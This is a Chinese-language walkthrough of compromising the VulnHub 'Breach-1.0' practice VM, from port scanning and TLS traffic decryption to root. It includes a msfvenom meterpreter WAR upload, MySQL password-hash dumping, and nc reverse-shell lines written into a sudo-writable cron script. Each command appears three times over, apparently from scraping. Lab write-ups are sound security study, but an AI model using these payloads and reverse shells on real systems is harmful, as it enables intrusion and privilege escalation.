下载地址:
下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip
端口扫描
因为这个靶机,按照配置需求,我们已经知道了他的ip,所以我们直接开始端口扫描
nmap -T4 -A -v 192.168.110.140nmap -T4 -A -v 192.168.110.140nmap -T4 -A -v 192.168.110.140
但是,和我们想的有点出入,扫出来端口有点多,估计是不让我们进行端口扫描
没办法,我们先打开自己最喜欢的80吧
查看源码
右键查看源代码,或者F12,我们可以看见有一段注释
看起来像是加密,管他的,直接解密再说,经过两次解密,成功获得一下内容
pgibbons:damnitfeel$goodtobeagang$tapgibbons:damnitfeel$goodtobeagang$tapgibbons:damnitfeel$goodtobeagang$ta
盲猜是一个账号密码,现在找找有什么地方可以进去
点开刚刚的帅哥图片,我们进去另外一个新的网页,一顿乱点,我们进入了一次cms系统
目录扫描
dirb http://192.168.110.140dirb http://192.168.110.140dirb http://192.168.110.140
通过扫描,我们没有发现扫描其他有用的目录
成功使用刚刚的密码,进入系统
出现一个目录系统,管他的,先看看有没有可以使用的
扫描漏洞
对于开源cms系统,我们可以去扫描已知开源漏洞,接下来打开msf
虽然扫出来几个漏洞,但是没办法使用
现在只能再来看看cms里面还有没有什么好东西可以利用
突然看见有几份邮件
我们看见这里有一个.keystore文件
接着我们有发现了这样一个文件,是wireshark的流量包
并且发现一个密码”tomcat“,接下来,我们解密这个keystore
使用命令,拿到证书,我们导入wireshark
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcatkeytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcatkeytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
编辑–首选项–protocals–TLS –edit
对流量进行过滤
ip.src==192.168.110.140 || ip.dst == 192.168.110.140 and httpip.src==192.168.110.140 || ip.dst == 192.168.110.140 and httpip.src==192.168.110.140 || ip.dst == 192.168.110.140 and http
解密后,得到这样一个地址
![图片[15]-kali渗透综合靶机–Breach-1.0靶机-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-212-1024x187.png)
浏览器却打不开,提示非安全链接。。。。
接下来,我们使用burp来进行代理绕过证书 限制
接下来,就可以进去了
出现一个登录框
通过浏览抓包,接着找到账号密码
我们进入新的管理应用后台
这里有个上传的文件地方,我们来上传木马
创建war包
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.warmsfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.warmsfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.war
设置msfconsole监听
依次输入一下代码
use exploit/multi/handlerset payload java/meterpreter/reverse_tcpset lhost 192.168.110.129set lport 7777exploituse exploit/multi/handler set payload java/meterpreter/reverse_tcp set lhost 192.168.110.129 set lport 7777 exploituse exploit/multi/handler set payload java/meterpreter/reverse_tcp set lhost 192.168.110.129 set lport 7777 exploit
快速上传kali.war 并且访问,成功获取权限
metersploit默认不能交互式shell,但是如何安装了python,可以使用一下命令进行切换
python -c \'import pty;pty.spawn(\"/bin/bash\")\'python -c \'import pty;pty.spawn(\"/bin/bash\")\'python -c \'import pty;pty.spawn(\"/bin/bash\")\'
然后我们查看到该网站为apache部署的,Apache默认网站在/var/www下面
发现一个mysql数据库,并且知道数据库为root,密码为空
使用一下代码获得用户密码
show databases;use mysql;show tables;select user,password from user;show databases; use mysql; show tables; select user,password from user;show databases; use mysql; show tables; select user,password from user;
通过MD5解密获得,milton的密码为thelaststraw
从历史命令里面空间,他切换过用户,但是密码确实离谱,来源于以前的那一堆图片里面,使用的图片隐写
将图片都下载下了之后,使用exiftool工具获取到隐藏文件信息
exiftool * | grep -i -e \'File Name\' -e \'Comment\'exiftool * | grep -i -e \'File Name\' -e \'Comment\'exiftool * | grep -i -e \'File Name\' -e \'Comment\'
接着我们成功进入blumbergh
通过我们查看历史,我们发现一个定时任务,可以借此来新建反弹shell
kali再新建一个监听 nc -lvvp 5555
先将反弹shell命令写入shell.txt文件,nc反弹命令
echo \"nc -e /bin/bash 192.168.110.129 5555\" > shell.txtecho \"nc -e /bin/bash 192.168.110.129 5555\" > shell.txtecho \"nc -e /bin/bash 192.168.110.129 5555\" > shell.txt
再使用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.shcat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.shcat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
也可以用mknod backpipe p && nc 192.168.110.129 2222 0<backpipe | /bin/bash 1>backpipe反弹shell
查看tidyup.sh文件写入成功:cat /usr/share/cleanup/tidyup.sh
成功获取root权限
暂无评论内容